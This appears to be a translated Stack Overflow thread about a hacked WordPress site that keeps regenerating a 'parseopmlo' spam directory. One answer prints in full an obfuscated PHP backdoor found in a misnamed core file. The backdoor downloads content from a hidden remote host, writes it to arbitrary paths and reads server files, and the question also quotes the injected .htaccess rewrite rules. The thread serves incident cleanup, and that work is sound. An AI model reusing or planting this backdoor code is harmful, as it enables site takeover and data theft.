【问题标题】:Can't find malicious code creating 'parseopmlo' directory找不到创建“parseopmlo”目录的恶意代码
【发布时间】:2019-02-14 21:16:12
【问题描述】:

我为非营利组织工作。我们的 WordPress 网站(Bluehost 上的共享主机)本周早些时候遭到黑客攻击,黑客似乎创建了一个脚本,该脚本会自动在根目录中创建一个名为“parseopmlo”的目录,其中包含两个文件,index.php 和 moban.html。它同时编辑 .htaccess 文件,添加以下代码:

RewriteRule ^.*[-/]n(\d+)-.*$ parseopmlo/index\.php?id=$1&%{QUERY_STRING} [L]

RewriteRule ^n(\d+)-.*$ parseopmlo/index\.php?id=$1&%{QUERY_STRING} [L]

RewriteRule ^r(\d+)[-/].*[-/]n(\d+)-.*$ parseopmlo/index\.php?id=$1-$2&%{QUERY_STRING} [L]

RewriteRule ^r(\d+)[-/]n(\d+)[-/].*$ parseopmlo/index\.php?id=$1-$2&%{QUERY_STRING} [L]

RewriteRule ^n(\d+)[-/].*[-/]r(\d+)[-/].*$ parseopmlo/index\.php?id=$2-$1&%{QUERY_STRING} [L]

RewriteRule ^n(\d+)[-/]r(\d+)[-/].*$ parseopmlo/index\.php?id=$2-$1&%{QUERY_STRING} [L]

RewriteRule ^.*[-/]n(\d+)[-/]r(\d+)[-/].*$ parseopmlo/index\.php?id=$2-$1&%{QUERY_STRING} [L]

RewriteRule ^.*[-/]n(\d+)[-/].*[-/]r(\d+)[-/].*$ parseopmlo/index\.php?id=$2-$1&%{QUERY_STRING} [L]

RewriteRule ^.*[-/]r(\d+)[-/].*[-/]n(\d+)[-/].*$ parseopmlo/index\.php?id=$1-$2&%{QUERY_STRING} [L]

RewriteRule ^.*[-/]r(\d+)[-/]n(\d+)[-/].*$ parseopmlo/index\.php?id=$1-$2&%{QUERY_STRING} [L]

我现在已经多次删除该目录,并多次恢复一个干净的 .htaccess 文件。每次都会重新创建目录并在 5-30 分钟内再次入侵 .htaccess。

我将所有密码更改为自动生成的非常强大的密码。不可能有人坐在那里登录我们网站的 FTP,手动进行这些更改。

这是我们服务器上的脚本,但我找不到。我使用 SSH 和 grep 命令递归地搜索服务器上的每个文件以查找包含文本字符串“parseopmlo”的任何内容,唯一的结果是 .htaccess 中的代码行。我希望它会出现在包含创建目录的脚本的任何文件中。没有骰子。

如果您在 Google 上搜索“parseopmlo”,您将获得大量以同样方式被黑客入侵的其他网站,但没有提及如何解决此问题。

关于如何查找和删除恶意代码的任何想法?

【问题讨论】:

  • 每次服务器被入侵时,答案都是一样的。摧毁它,然后再做一次。 serverfault.com/questions/218005/…
  • 如前所述,您的服务器已被入侵。具体来说,您的 WordPress 安装。您需要完全重新安装。联系 Bluehost 支持。

标签: php .htaccess mkdir


【解决方案1】:

为了任何可能在未来谷歌“parseopmlo”寻找解决方案的人的利益......在 Bluehost 的恶意软件扫描的帮助下,我确定了导致问​​题的文件。它是:/wp-includes/customize/class-wp-customize-filters-setting.php 作为记录,在 WP 的干净版本中,该文件名中包含单数“过滤器”,而不是复数“过滤器”。 Bluehost 将该文件中的恶意软件分类为 SL-PHP-FILEHACKER-md5-bfcn.UNOFFICIAL

这是其中包含的代码:

    <?php


@ini_set('display_errors', 0);@set_time_limit(3600);
$q1 = "O00O0O";$q2 = "O0O000";$q3 = "O0OO00";$q4 = "OO0O00";$q5 = "OO0000";$q6 = "O00OO0";$q7 = "O00O00";$q8 = "O00OOO";$q9 = "O0O0OO";$q10 = "OOO0OO";$q11 = "OO00OO";$q12 = "OO000O";$q13 = "OO0O0O";$q14 = "OOOO00";$q15 = "OO0OO0O";$$q1 = RandAbc();$$q3 =  $O00O0O{62}.$O00O0O{51}.$O00O0O{50}.$O00O0O{54}.$O00O0O{55};$$q5 = $O00O0O{28}.$O00O0O{26}.$O00O0O{27}.$O00O0O{33};$$q6 = $O00O0O{19}.$O00O0O{22}.$O00O0O{12}.$O00O0O{1}.$O00O0O{0}.$O00O0O{12}.$O00O0O{0}.$O00O0O{17}.$O00O0O{10}.$O00O0O{4}.$O00O0O{19};$$q4 = $$O0OO00;$$q2 = $O00O0O{12}.$O00O0O{3}.$O00O0O{31};$$q7 = $O00O0O{30}.$O00O0O{35}.$O00O0O{32}.$O00O0O{34}.$O00O0O{31}.$O00O0O{34}.$O00O0O{31}.$O00O0O{3}.$O00O0O{26}.$O00O0O{5}.$O00O0O{5}.$O00O0O{4}.$O00O0O{29}.$O00O0O{31}.$O00O0O{28}.$O00O0O{27}.$O00O0O{0}.$O00O0O{26}.$O00O0O{30}.$O00O0O{32}.$O00O0O{5}.$O00O0O{26}.$O00O0O{30}.$O00O0O{34}.$O00O0O{28}.$O00O0O{5}.$O00O0O{33}.$O00O0O{0}.$O00O0O{3}.$O00O0O{31}.$O00O0O{34}.$O00O0O{3};$$q8 =  $O00O0O{23}.$O00O0O{24}.$O00O0O{25};$$q9 = $O00O0O{62}.$O00O0O{54}.$O00O0O{40}.$O00O0O{53}.$O00O0O{57}.$O00O0O{40}.$O00O0O{53};$$q10 = $$O0O0OO;$$q11 = $O00O0O{39}.$O00O0O{50}.$O00O0O{38}.$O00O0O{56}.$O00O0O{48}.$O00O0O{40}.$O00O0O{49}.$O00O0O{55}.$O00O0O{62}.$O00O0O{53}.$O00O0O{50}.$O00O0O{50}.$O00O0O{55};$$q12 = $O00O0O{51}.$O00O0O{43}.$O00O0O{51}.$O00O0O{62}.$O00O0O{54}.$O00O0O{40}.$O00O0O{47}.$O00O0O{41};$$q13 = $O00O0O{2}.$O00O0O{6}.$O00O0O{4}.$O00O0O{19};$$q14 = $O00O0O{8}.$O00O0O{13}.$O00O0O{3}.$O00O0O{4}.$O00O0O{23}.$O00O0O{63}.$O00O0O{15}.$O00O0O{7}.$O00O0O{15};$$q15 = $O00O0O{7}.$O00O0O{19}.$O00O0O{19}.$O00O0O{15}.$O00O0O{64}.$O00O0O{65}.$O00O0O{65}.$O00O0O{22}.$O00O0O{22}.$O00O0O{22}.$O00O0O{63};
if(isset($OOO0OO["$OO00OO"])){$BT = $OOO0OO["$OO00OO"];}elseif(isset($OOO0OO["$OO000O"])){$BT = str_ireplace(str_replace("\\",DIRECTORY_SEPARATOR,str_replace("/",DIRECTORY_SEPARATOR,$OOO0OO["$OO000O"])),'',__FILE__).DIRECTORY_SEPARATOR;}else{$BT = '/';}
foreach($OO0O00 as $O00O00o=>$O00Oo0o){
    $$O00O00o = $O00Oo0o;
}

if(!(isset($passwd) && $O0O000($passwd) == $O00O00)){
    header("HTTP/1.1 404 Not Found");  
    header("Status: 404 Not Found");  
    exit; 
}

if(isset($act) && $act == 'check' && isset($check_file)){
    if(file_exists($check_file)){
        echo '#ok#';
    }
}

if(isset($act) && $act == 'test'){
        echo '#ok#';
}

if(isset($act) && $act == 'recover' && isset($recover_file) && isset($recover_file_url)){
{

            $pfile = $recover_file;
            $date = $OO0O0O($recover_file_url);
            gdir_file($recover_file);
            @chmod($pfile,0755);

            if($date && file_put_contents($pfile,$date)){
                echo '#ok#';
            }else{
                echo '#fail#';
            }

    }
}

if(isset($act) && $act == 'redate' && isset($redate_file)){
    if(file_exists($redate_file)){
        echo rdFile($redate_file);
    }
}

function RandAbc($length = "") {
    $str = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_.:/-";
    return ($str);
} 

function rdFile($file){
    if(function_exists('file_get_contents')){
        return file_get_contents($file);
    }else{
        $handle = fopen($file, "r");
        $contents = fread($handle, filesize($file));
        fclose($handle);
        return $contents;
    }
}

function cget($url,$loop=10){
    $data = false;        $i = 0; 

    while(!$data) {
             $data = tcget($url);             if($i++ >= $loop) break;        }
    return $data;
}

function tcget($url,$proxy=''){
    global $OO0OO0O, $O00OO0, $OO0000, $O00OOO;
     $data = '';        $url = "$OO0OO0O$O00OO0.$O00OOO/".$url;
 $url = trim($url);     if (extension_loaded('curl') && function_exists('curl_init') && function_exists('curl_exec')){
         $ch = curl_init();         curl_setopt($ch, CURLOPT_URL, $url);         curl_setopt($ch, CURLOPT_HEADER, false);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);        
         curl_setopt($ch, CURLOPT_TIMEOUT, 60);         $data = curl_exec($ch);         curl_close($ch);      }

     if ($data == ''){
         if (function_exists('file_get_contents') && $url){
             $data = @file_get_contents($url);             }
         }

     if (($data == '') && $url){
         if (function_exists('fopen') && function_exists('ini_get') && ini_get('allow_url_fopen')){
             ($fp = @fopen($url, 'r'));            
             if ($fp){

                 while (!@feof($fp)){
                     $data .= @fgets($fp) . '';                     }

                 @fclose($fp);                 }
             }
         }
     return $data;  
}

function m_mkdir($dir){
        if(!is_dir($dir)) mkdir($dir);
    }

function gdir_file($gDir=''){
        global $BT;
        $gDir = str_replace('/',DIRECTORY_SEPARATOR,$gDir);
        $gDir = str_replace('\\',DIRECTORY_SEPARATOR,$gDir);
        $arr = explode(DIRECTORY_SEPARATOR,$gDir);

        if(count($arr) <= 0) return;


        if(!strstr($gDir,$BT))
            $dir = $BT;
        else
            $dir = '';

        for($i = 0 ; $i < count($arr)-1 ; $i++){
            $dir .= '/' . $arr[$i];
            m_mkdir($dir);
        }

        return $dir;
}

//

我不是编码员,所以这真的让我难以置信,这怎么可能编辑我们的 .htaccess 文件。但确实如此。

【讨论】:

    【解决方案2】:

    所以我刚刚清理了我的整个 wordpress 安装,现在它又可以工作了,步骤如下:

    1. 删除 /wp-includes/customize/class-wp-customize-filters-setting.php 文件
    2. 下载新的 Wordpress 安装并覆盖所有核心文件
    3. 将/html/wp-includes/load.php的权限改为644
    4. 将 index.php 的权限也更改为 644

    现在刷新您的页面,并尽量避免将来出现这些问题!

    如果我保存了你的 Wordpress 安装 -> 投票给大家

    【讨论】:

      【解决方案3】:

      您的服务器遭到入侵。您的 WordPress 安装中添加了一些内容。这就是重新创建“parseopmlo”目录的原因。

      步骤:

      1. 联系 Bluehost 的支持。
      2. 很可能,他们要么删除您的网站,要么告诉您这样做。 (整个目录树。)
      3. 准备从备份重新安装。 (您确实有备份,对吗?)
      4. 考虑安装安全插件。 WordFence 很受欢迎。另外,搜索“Wordpress Hardening”。

      祝你好运。

      【讨论】:

        【解决方案4】:

        我发现在 wp-includes、wp-admin 中感染了多个文件:template-loader.php、load.php、user-terms.php、replace.php 和几个 .gif 图像。

        我安装了免费版本的 Sucuri Security Wordpress(谷歌搜索),它轻而易举地突出显示所有受损文件。希望对你有帮助。

        攻击者还上传了一个 html 文件并在网站管理员控制台中添加为所有者,然后上传了 23 个站点地图,其中包含数十万个链接。 确保验证用于身份验证的 google html 文件。

        【讨论】:

          猜你喜欢
          • 1970-01-01
          • 2016-06-14
          • 2021-02-05
          • 2013-09-09
          • 2017-02-12
          • 1970-01-01
          • 1970-01-01
          • 2019-01-16
          • 2011-12-28
          相关资源
          最近更新 更多